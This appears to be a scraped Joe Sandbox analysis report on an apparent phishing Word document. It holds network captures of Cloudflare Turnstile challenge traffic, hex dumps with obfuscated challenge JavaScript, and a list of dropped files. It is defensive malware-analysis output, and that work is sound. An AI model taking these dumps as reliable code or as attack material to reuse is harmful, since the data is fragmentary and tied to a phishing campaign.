2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 67 4c 28 32 30 36 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 72 2c 64 2c 65 2c 66 2c 67 29 7b 69 72 3d 67 4c 2c 64 3d 7b 7d 2c 64 5b 69 72 28 32 30 31 31 29 5d 3d 69 72 28 31 35 30 31 29 2c 65 3d 64 2c 66 3d 31 2c 67 3d 31 65 33 2a 65 4d 5b 69 72 28 31 34 39 39 29 5d 5b 69 72 28 31 32 32 32 29 5d 28 32 3c 3c 66 2c 33 32 29 2c 65 4d 5b 69 72 28 38 39 31 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 73 29 7b 69 73 3d 69 72 2c 65 4d 5b 69 73 28 31 33 38 38 29 5d 26 26 28 65 4d 5b 69 73 28 37 30 32 29 5d 5b 69 73 28 31 37 31 30 29 5d 28 29 2c 65 4d 5b 69 73 28 37 30 32 29 5d 5b 69 73 28 31 31 32 37 29 5d 28 29 2c 65 4d 5b 69 73 28 35 31 37 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 69 73 28 31 33 38 38 29 5d 5b 69 73 28 31 38 37 32 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 69 73 Data Ascii: gL(2069)]=function(ir,d,e,f,g){ir=gL,d={},d[ir(2011)]=ir(1501),e=d,f=1,g=1e3*eM[ir(1499)][ir(1222)](2<<f,32),eM[ir(891)](function(is){is=ir,eM[is(1388)]&&(eM[is(702)][is(1710)](),eM[is(702)][is(1127)](),eM[is(517)]=!![],eM[is(1388)][is(1872)]({'source':is
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 69 74 28 31 38 38 36 29 5d 29 2b 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 35 38 32 29 5d 2b 27 2f 27 2c 65 4d 5b 69 74 28 31 39 34 34 29 5d 2e 63 48 29 2c 27 2f 27 29 2c 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 36 39 34 29 5d 29 2c 73 3d 7b 7d 2c 73 5b 69 74 28 31 35 36 30 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 35 36 30 29 5d 2c 73 5b 69 74 28 35 31 35 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 35 31 35 29 5d 2c 73 5b 69 74 28 32 30 36 36 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 32 30 36 36 29 5d 2c 73 5b 69 74 28 35 34 33 29 5d 3d 65 4d 5b 69 74 28 31 39 34 34 29 5d 5b 69 74 28 31 34 33 33 29 5d 2c 78 3d 73 2c 42 3d 6e 65 77 20 65 4d 5b 28 69 74 28 39 35 37 29 29 5d 28 29 2c 21 42 29 Data Ascii: it(1886)])+eM[it(1944)][it(1582)]+'/',eM[it(1944)].cH),'/'),eM[it(1944)][it(1694)]),s={},s[it(1560)]=eM[it(1944)][it(1560)],s[it(515)]=eM[it(1944)][it(515)],s[it(2066)]=eM[it(1944)][it(2066)],s[it(543)]=eM[it(1944)][it(1433)],x=s,B=new eM[(it(957))](),!B)

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:51 UTC	1150	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 3197 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:51 UTC	3197	OUT	Data Raw: 76 5f 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 3d 42 61 6b 53 2d 53 58 53 4c 53 74 53 25 32 62 53 78 37 5a 31 37 5a 2d 43 66 2d 66 45 51 57 66 51 5a 66 43 36 45 77 61 67 5a 62 36 5a 56 43 56 77 6d 6b 66 63 56 36 4d 4a 58 5a 77 4b 73 53 5a 2d 4e 33 54 5a 6d 59 67 66 4f 5a 74 43 51 45 47 4a 50 5a 51 54 5a 38 67 66 62 58 56 5a 43 67 5a 57 5a 54 4b 6f 2d 5a 6f 43 4c 4a 5a 38 43 6b 62 6f 63 71 79 71 46 5a 4d 74 5a 66 6f 59 4b 66 73 67 6b 36 5a 32 48 53 5a 45 71 66 4f 6b 67 74 5a 48 69 61 5a 32 5a 63 66 56 4c 5a 63 5a 4d 61 75 5a 63 73 6f 33 54 53 5a 63 53 4c 58 5a 35 2d 5a 6b 2b 36 46 5a 69 6b 2d 54 67 4c 4b 42 53 51 4c 43 53 4c 24 5a 36 73 65 36 5a 58 58 5a 32 6b 5a 53 72 4e 55 5a 74 55 42 5a 42 78 36 63 50 5a 5a 75 53 50 2d 62 68 78 38 5a 4c 78 78 79 Data Ascii: v_8e497d813cb62ff4=BakS-SXSLStS%2bSx7Z17Z-Cf-fEQWfQZfC6EwagZb6ZVCVwmkfcV6MJXZwKsSZ-N3TZmYgfOZtCQEGJPZQTZ8gfbXVZCgZWZTKo-ZoCLJZ8CkbocqyqFZMtZfoYKfsgk6Z2HSZEqfOkgtZHiaZ2ZcfVLZcZMauZcso3TSZcSLXZ5-Zk+6FZik-TgLKBSQLCSL$Z6se6ZXXZ2kZSrNUZtUBZBx6cPZZuSP-bhx8ZLxxy
2024-11-18 16:55:51 UTC	747	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:51 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 149820 Connection: close cf-chl-gen: KMN5Tx6Z/4SEhOSXm/vgxw4y2CxL0qkv4ox3WbKNM79bBQFT9dThQlbXGIcOf64LHxA/rR3fDDJEz2uzbDjVs7+iOnN1AKKUMJe3SKi5x3VFbLQrWodnLW+HhAqQBdWWnRB/E06Sj13l1j2aKb8h4Upxn0tPui0X18gmRwwurSy6cenonV0uZoHbFoSM6G9rxFTdkAw8gGLBd000ietrZEgk4TFrkbKRNcUPgJHuARSYFgJ/T71VO5SDk4emk5Fn2nBWtRwltowlTd1UU8/3ys5r/qf2sCqT01z0fOED9Fzqri2BbrWTJCCUiSc5x1Ko+X3gUsDGLD7xi0TxzX1qLOGWiXoWLn672fqsJM+s0TJz8eqDBEW4GJIbHaAo5PCOiaMSZyMckuD9W8tcR43XNGV/F5XWLGhCxgXz89I1E0O+0fHMRGoK16AnuQl4BswhTh2JheCWZm41jp1JEVkJLW9zvVhr98gOH/h4esphHG+TisU=$KabJFWYmXCSwyqza Server: cloudflare CF-RAY: 8e497d932a826ba3-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:51 UTC	622	IN	Data Raw: 71 58 69 4d 77 5a 62 46 6f 72 57 5a 75 49 4f 65 6c 4d 4b 5a 78 6f 76 4d 30 37 79 4c 77 4d 2f 48 32 4e 65 76 32 5a 6e 4a 33 35 2b 59 33 72 58 43 33 63 2f 67 73 39 4b 2f 34 4c 57 6e 77 72 6e 62 35 75 76 73 77 4e 37 4c 38 37 4b 77 7a 38 6e 6d 2f 50 76 66 2f 62 33 76 33 64 32 2f 38 76 72 36 43 51 6a 35 43 73 67 4b 37 51 58 4a 44 75 48 37 7a 77 49 59 43 38 2f 74 46 65 77 48 38 2f 62 78 32 42 33 32 39 64 77 68 34 41 6e 79 4a 53 51 66 35 78 67 70 41 68 73 49 4c 4f 37 74 44 53 44 30 4c 77 34 31 44 79 63 55 4d 42 37 35 50 55 41 34 2f 55 45 38 49 45 59 45 52 45 67 4c 43 44 6b 65 44 67 30 4b 44 46 45 4f 46 44 6b 78 53 6b 38 75 4b 46 4d 75 55 68 67 69 56 45 30 64 59 55 5a 49 4d 54 39 73 56 79 6b 74 5a 30 52 47 52 57 35 68 4c 6b 5a 4d 61 32 56 6a 63 58 4e 56 66 44 35 Data Ascii: qXiMwZbForWZuIOelMKZxovM07yLwM/H2Nev2ZnJ35+Y3rXC3c/gs9K/4LWnwrnb5uvswN7L87Kwz8nm/Pvf/b3v3d2/8vr6CQj5CsgK7QXJDuH7zwIYC8/tFewH8/bx2B329dwh4AnyJSQf5xgpAhsILO7tDSD0Lw41DycUMB75PUA4/UE8IEYEREgLCDkeDg0KDFEOFDkxSk8uKFMuUhgiVE0dYUZIMT9sVyktZ0RGRW5hLkZMa2VjcXNVfD5
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 78 68 59 49 79 50 67 57 64 73 6c 70 56 7a 63 6d 79 54 62 36 4b 69 67 6e 65 59 6b 70 4a 32 64 48 68 6c 66 6e 2b 70 73 70 31 73 63 71 2b 66 68 33 57 51 68 5a 68 38 6e 58 78 36 6e 33 65 30 72 71 48 42 68 72 43 62 75 6f 61 63 71 71 53 38 73 4b 36 6d 77 4c 2b 4d 76 5a 47 4a 71 5a 57 75 6d 62 4f 39 6e 4b 72 50 31 70 36 64 6c 75 58 6a 34 73 4c 62 71 75 76 48 75 61 76 61 35 2b 48 75 34 4c 2b 78 35 63 2f 5a 37 76 72 34 74 65 66 58 74 2b 37 55 31 2b 7a 6b 77 66 50 66 42 73 6a 64 2b 38 77 4f 42 41 59 48 35 2f 77 41 44 76 50 52 37 42 62 32 36 2b 34 57 37 64 6e 74 38 74 7a 59 39 53 50 66 47 50 4d 70 43 4f 6a 37 4c 67 73 6f 39 7a 41 4f 42 76 73 30 48 77 6f 41 4f 42 73 4f 42 44 77 65 45 67 68 41 4c 78 59 4d 52 44 49 61 45 45 67 30 48 68 52 4d 50 79 49 59 55 45 49 78 49 Data Ascii: xhYIyPgWdslpVzcmyTb6KigneYkpJ2dHhlfn+psp1scq+fh3WQhZh8nXx6n3e0rqHBhrCbuoacqqS8sK6mwL+MvZGJqZWumbO9nKrP1p6dluXj4sLbquvHuava5+Hu4L+x5c/Z7vr4tefXt+7U1+zkwfPfBsjd+8wOBAYH5/wADvPR7Bb26+4W7dnt8tzY9SPfGPMpCOj7Lgso9zAOBvs0HwoAOBsOBDweEghALxYMRDIaEEg0HhRMPyIYUEIxI
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 70 69 35 64 2f 6c 58 4a 30 64 6e 5a 38 68 5a 42 33 64 48 53 49 6d 36 79 58 6c 33 2b 78 6b 61 74 37 73 36 4b 4a 66 37 65 6c 6a 59 4f 37 70 35 47 48 76 37 4b 56 69 38 4f 31 70 4a 4f 5a 66 36 75 61 7a 61 62 4d 6e 4a 75 74 6a 4b 57 6d 6f 4d 4c 42 77 64 62 47 78 62 76 61 79 73 6d 37 33 73 37 4d 34 65 4c 53 30 4e 33 6d 31 74 54 64 36 74 72 59 70 75 37 65 33 4c 4c 79 34 75 44 35 39 75 62 6b 30 4c 6e 36 78 2b 7a 4f 77 62 58 67 76 63 62 64 42 38 48 4b 38 2f 72 46 7a 73 6e 74 45 2f 34 51 7a 67 58 52 36 73 37 35 32 41 30 4f 38 4f 6b 56 36 78 6e 5a 2b 53 59 61 35 66 7a 68 47 41 7a 64 2f 67 45 76 36 53 50 6a 44 65 2f 73 46 2f 48 70 49 6a 45 53 4e 69 63 36 4d 51 77 2f 4d 42 52 44 4f 68 55 6e 50 78 34 64 48 51 59 36 54 43 38 65 50 43 6f 7a 44 45 78 43 4d 79 64 51 4f 54 Data Ascii: pi5d/lXJ0dnZ8hZB3dHSIm6yXl3+xkat7s6KJf7eljYO7p5GHv7KVi8O1pJOZf6uazabMnJutjKWmoMLBwdbGxbvaysm73s7M4eLS0N3m1tTd6trYpu7e3LLy4uD59ubk0Ln6x+zOwbXgvcbdB8HK8/rFzsntE/4QzgXR6s752A0O8OkV6xnZ+SYa5fzhGAzd/gEv6SPjDe/sF/HpIjESNic6MQw/MBRDOhUnPx4dHQY6TC8ePCozDExCMydQOT
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 6e 49 42 77 63 4b 43 45 64 48 4b 6b 69 48 74 66 71 49 78 2f 5a 33 75 4e 6e 35 32 6b 6f 6f 56 34 6a 5a 65 62 68 6e 57 6e 67 4a 37 42 6f 72 71 67 77 71 65 6b 78 72 61 31 70 38 71 36 75 4d 33 4f 76 72 7a 4a 30 73 4c 41 78 34 2b 54 73 5a 75 59 33 74 32 53 6d 62 6a 58 30 64 72 57 70 75 43 34 79 4c 50 6d 70 63 43 70 75 2b 2f 54 72 71 7a 69 34 4c 47 31 78 4e 6e 4c 79 64 6a 61 37 38 33 71 38 4e 58 4d 77 39 76 6f 39 38 6a 54 2b 64 6e 31 33 77 76 61 2f 4f 33 71 37 41 4c 6b 42 4f 6a 6b 42 77 2f 6f 2b 52 4d 65 43 52 44 32 45 69 50 58 41 69 44 35 47 68 6b 67 42 42 30 62 2f 53 6e 35 45 78 4d 57 4a 67 76 79 44 76 51 53 46 54 72 35 46 6a 45 4c 44 77 30 52 4f 53 4d 34 50 68 68 46 4b 54 67 6b 52 77 6f 77 44 79 45 6d 53 77 31 52 4e 30 55 73 49 78 49 38 4d 56 30 37 4f 43 39 Data Ascii: nIBwcKCEdHKkiHtfqIx/Z3uNn52kooV4jZebhnWngJ7Borqgwqekxra1p8q6uM3OvrzJ0sLAx4+TsZuY3t2SmbjX0drWpuC4yLPmpcCpu+/Trqzi4LG1xNnLydja783q8NXMw9vo98jT+dn13wva/O3q7ALkBOjkBw/o+RMeCRD2EiPXAiD5GhkgBB0b/Sn5ExMWJgvyDvQSFTr5FjELDw0ROSM4PhhFKTgkRwowDyEmSw1RN0UsIxI8MV07OC9
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 6e 31 67 64 35 2b 64 6c 32 2b 42 68 4b 4b 68 63 4c 52 30 6f 71 32 57 64 6f 32 34 6b 71 64 34 6f 4c 71 39 66 62 69 43 6b 34 4f 36 6d 37 2f 44 67 38 71 4f 79 4c 33 4d 73 62 75 4d 78 4a 62 42 70 37 4c 49 7a 4b 6d 32 70 70 32 74 75 71 72 4d 73 62 36 63 34 4c 58 43 6f 4f 6e 49 34 73 7a 6c 76 38 72 66 76 61 7a 43 39 4f 4c 47 39 73 7a 4e 36 39 7a 56 39 4d 76 56 76 76 6e 4f 78 62 37 37 30 76 6e 4b 42 4e 58 37 79 65 49 50 32 2b 59 4e 46 4e 34 4d 31 2f 66 57 42 42 66 71 37 77 6e 75 2f 75 6b 4f 2b 77 30 53 2b 68 55 41 42 50 4c 6d 2b 78 66 6c 47 77 51 73 2f 41 55 4f 46 41 38 67 2b 44 59 4e 38 79 73 73 47 44 67 4f 4f 66 6b 45 4e 30 51 30 4e 69 55 63 4b 54 51 61 4b 53 30 36 49 43 67 72 55 30 4e 42 43 53 68 54 4d 55 67 32 4f 69 70 49 47 42 64 4f 4f 44 78 63 52 31 5a 6f Data Ascii: n1gd5+dl2+BhKKhcLR0oq2Wdo24kqd4oLq9fbiCk4O6m7/Dg8qOyL3MsbuMxJbBp7LIzKm2pp2tuqrMsb6c4LXCoOnI4szlv8rfvazC9OLG9szN69zV9MvVvvnOxb770vnKBNX7yeIP2+YNFN4M1/fWBBfq7wnu/ukO+w0S+hUABPLm+xflGwQs/AUOFA8g+DYN8yssGDgOOfkEN0Q0NiUcKTQaKS06ICgrU0NBCShTMUg2OipIGBdOODxcR1Zo
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 4b 5a 67 4a 4b 75 68 32 75 6b 6f 72 4b 47 65 49 4e 36 72 4c 46 33 6f 59 79 37 65 35 65 6c 66 49 4b 77 6e 49 43 68 78 72 33 44 6d 5a 36 4d 79 62 75 4e 31 73 7a 4f 32 5a 4f 54 79 35 4c 57 74 5a 6a 41 72 4a 36 33 33 72 72 54 77 63 57 31 30 38 69 6d 32 65 54 4d 78 64 33 6f 33 62 44 41 78 4d 43 32 74 2b 72 35 74 4c 33 50 32 39 33 38 34 64 6a 41 42 37 2f 63 77 38 63 4c 43 73 54 4e 33 2b 76 74 44 66 48 6f 30 42 66 50 37 4e 50 58 47 78 72 55 33 65 2f 37 2f 52 30 43 2b 4f 48 30 2b 51 55 49 45 77 72 71 37 42 30 72 2b 75 59 53 37 41 38 6d 43 51 49 74 37 79 30 55 47 76 67 72 2b 44 55 59 49 67 45 31 4e 68 6b 47 46 78 52 43 43 7a 6f 59 44 52 67 34 48 6b 63 4d 4e 46 45 4f 54 78 4d 54 57 44 78 50 56 45 63 39 4c 53 70 57 52 46 63 2b 51 45 4d 79 59 44 67 38 58 47 34 39 51 Data Ascii: KZgJKuh2ukorKGeIN6rLF3oYy7e5elfIKwnIChxr3DmZ6MybuN1szO2ZOTy5LWtZjArJ633rrTwcW108im2eTMxd3o3bDAxMC2t+r5tL3P29384djAB7/cw8cLCsTN3+vtDfHo0BfP7NPXGxrU3e/7/R0C+OH0+QUIEwrq7B0r+uYS7A8mCQIt7y0UGvgr+DUYIgE1NhkGFxRCCzoYDRg4HkcMNFEOTxMTWDxPVEc9LSpWRFc+QEMyYDg8XG49Q
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 6b 6f 71 57 53 64 37 65 48 72 48 6d 37 65 72 6c 39 72 34 36 43 66 58 2b 55 6b 33 79 42 77 70 57 41 7a 5a 2b 4c 69 4a 75 2b 6e 5a 61 76 75 4b 48 4a 30 70 53 77 71 63 32 74 7a 4c 36 63 6f 4b 47 2b 77 4f 47 6b 34 71 6a 4b 33 65 50 69 36 38 48 4d 76 39 4c 72 36 2f 66 59 31 38 57 7a 75 63 66 64 30 4e 57 7a 38 2f 72 31 32 77 51 46 41 75 44 34 2f 67 37 38 2b 74 38 42 32 67 4d 4b 36 52 51 49 37 76 6a 6b 38 39 66 6f 2b 77 63 50 31 76 76 71 33 76 4d 44 34 75 63 53 47 65 59 58 39 78 33 32 47 77 51 68 37 79 2f 2b 38 76 51 46 42 51 62 31 45 7a 63 48 2f 76 56 43 47 77 74 42 46 41 4d 50 46 43 51 46 52 43 30 45 50 67 45 4f 55 55 5a 52 4c 46 59 6b 54 54 52 59 4d 44 4a 59 53 42 63 74 4c 69 45 35 55 7a 46 6d 57 68 39 5a 4f 44 67 71 51 52 39 43 61 6b 45 75 62 32 64 71 54 44 Data Ascii: koqWSd7eHrHm7erl9r46CfX+Uk3yBwpWAzZ+LiJu+nZavuKHJ0pSwqc2tzL6coKG+wOGk4qjK3ePi68HMv9Lr6/fY18Wzucfd0NWz8/r12wQFAuD4/g78+t8B2gMK6RQI7vjk89fo+wcP1vvq3vMD4ucSGeYX9x32GwQh7y/+8vQFBQb1EzcH/vVCGwtBFAMPFCQFRC0EPgEOUUZRLFYkTTRYMDJYSBctLiE5UzFmWh9ZODgqQR9CakEub2dqTD
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 76 4c 52 37 72 4b 71 32 75 34 36 65 75 72 2b 54 6c 4c 2b 73 78 4b 58 43 6a 4b 54 46 73 71 76 53 31 4b 4c 4e 73 4b 4b 34 71 4d 66 53 75 39 4f 74 30 4d 72 65 78 62 44 59 74 64 76 70 77 65 57 34 31 37 75 6f 36 63 33 54 30 65 4b 72 39 62 44 4a 34 74 6a 5a 31 4f 58 77 32 4d 2f 52 2f 50 7a 57 33 67 48 46 31 4e 48 48 42 73 63 4e 42 63 76 38 2b 67 63 4d 33 75 34 4c 45 4f 50 6b 45 50 77 56 39 52 50 63 39 42 59 44 49 69 4d 6e 38 68 34 42 38 67 6e 34 47 43 4d 4d 4a 50 30 68 47 79 38 57 2f 69 6b 73 4c 44 6f 55 45 41 6b 62 45 54 38 68 50 52 4d 65 4f 78 34 59 49 52 46 46 48 55 78 46 4c 45 31 50 48 45 6b 53 52 52 4d 66 4a 6a 46 44 55 30 4e 58 4e 6c 46 48 4b 78 63 78 51 31 64 67 52 30 67 33 4f 7a 6b 35 59 30 56 48 62 30 4e 44 63 6d 56 64 53 33 55 2f 52 46 6c 70 4f 48 45 Data Ascii: vLR7rKq2u46eur+TlL+sxKXCjKTFsqvS1KLNsKK4qMfSu9Ot0MrexbDYtdvpweW417uo6c3T0eKr9bDJ4tjZ1OXw2M/R/PzW3gHF1NHHBscNBcv8+gcM3u4LEOPkEPwV9RPc9BYDIiMn8h4B8gn4GCMMJP0hGy8W/iksLDoUEAkbET8hPRMeOx4YIRFFHUxFLE1PHEkSRRMfJjFDU0NXNlFHKxcxQ1dgR0g3Ozk5Y0VHb0NDcmVdS3U/RFlpOHE
2024-11-18 16:55:51 UTC	1369	IN	Data Raw: 49 48 44 6c 73 4f 63 6b 36 71 6c 70 73 61 4f 76 5a 32 72 79 36 61 6e 6e 71 36 34 31 61 54 55 77 34 36 38 6c 63 65 53 79 72 71 38 33 4c 69 6c 74 72 50 65 74 64 61 69 37 71 54 64 78 39 75 36 33 73 76 50 78 73 54 77 77 66 44 47 39 72 54 79 7a 76 37 50 77 64 47 38 34 2f 7a 2b 78 76 76 79 2f 50 54 56 78 66 37 6d 2b 77 50 64 33 4f 34 4a 7a 68 48 74 30 4f 63 65 38 65 33 59 49 66 58 63 48 43 50 35 42 76 45 6e 2f 51 73 73 4b 77 49 50 49 79 44 37 49 4f 77 4f 39 4f 30 69 41 68 4c 79 45 54 30 75 42 79 6b 66 46 42 50 35 4f 42 4d 77 41 6a 34 57 43 51 5a 42 44 43 55 35 51 79 45 72 55 30 4e 42 43 53 68 54 4d 55 67 32 4f 52 74 49 47 42 64 50 50 45 52 50 59 56 78 47 49 56 6b 71 56 6a 78 48 58 47 45 2b 53 79 6c 79 55 57 74 56 62 6b 68 54 61 45 59 31 53 33 31 72 54 33 39 51 Data Ascii: IHDlsOck6qlpsaOvZ2ry6annq641aTUw468lceSyrq83LiltrPetdai7qTdx9u63svPxsTwwfDG9rTyzv7PwdG84/z+xvvy/PTVxf7m+wPd3O4JzhHt0Oce8e3YIfXcHCP5BvEn/QssKwIPIyD7IOwO9O0iAhLyET0uBykfFBP5OBMwAj4WCQZBDCU5QyErU0NBCShTMUg2ORtIGBdPPERPYVxGIVkqVjxHXGE+SylyUWtVbkhTaEY1S31rT39Q

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NoteID [4962398] _Secure_Document_Mrettinger-46568.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

QR Codes

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55167FC.jpeg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DC2CAFCD.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\msoE848.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3095BB30-BD35-41A0-82EB-423FA88914AF}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{49DFBACB-2D56-4112-AACC-105F42BFC53A}.tmp

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1731948920072586100_74C349BB-2D48-421D-9E91-C0AF6D2153BA.log

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1731948920073275000_74C349BB-2D48-421D-9E91-C0AF6D2153BA.log

C:\Users\user\AppData\Local\Temp\TCDBC06.tmp\Content.inf

C:\Users\user\AppData\Local\Temp\TCDBC06.tmp\chevronaccent.glox

C:\Users\user\AppData\Local\Temp\TCDBC16.tmp\Content.inf

C:\Users\user\AppData\Local\Temp\TCDBC16.tmp\architecture.glox

C:\Users\user\AppData\Local\Temp\TCDBC29.tmp\Content.inf

C:\Users\user\AppData\Local\Temp\TCDBC29.tmp\HexagonRadial.glox

C:\Users\user\AppData\Local\Temp\TCDBC2B.tmp\Content.inf

C:\Users\user\AppData\Local\Temp\TCDBC2B.tmp\InterconnectedBlockProcess.glox

C:\Users\user\AppData\Local\Temp\TCDBC3E.tmp\BracketList.glox

C:\Users\user\AppData\Local\Temp\TCDBC3E.tmp\Content.inf

Windows Analysis Report
NoteID [4962398] _Secure_Document_Mrettinger-46568.docx

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:53 UTC	599	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:53 UTC	379	IN	HTTP/1.1 404 Not Found Date: Mon, 18 Nov 2024 16:55:53 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: ZNmd9tj5k8Rbt3a67IwVYjty2/ijv/tc7OQ=$E9u5z8yzrOSODwFK Server: cloudflare CF-RAY: 8e497d9fcdc4485f-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:53 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-11-18 16:55:53 UTC	785	OUT	GET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-18 16:55:53 UTC	200	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 16:55:53 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8e497da1bc312c8e-DFW alt-svc: h3=":443"; ma=86400
2024-11-18 16:55:53 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 63 00 00 00 62 08 02 00 00 00 cb 05 fa 67 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRcbgIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
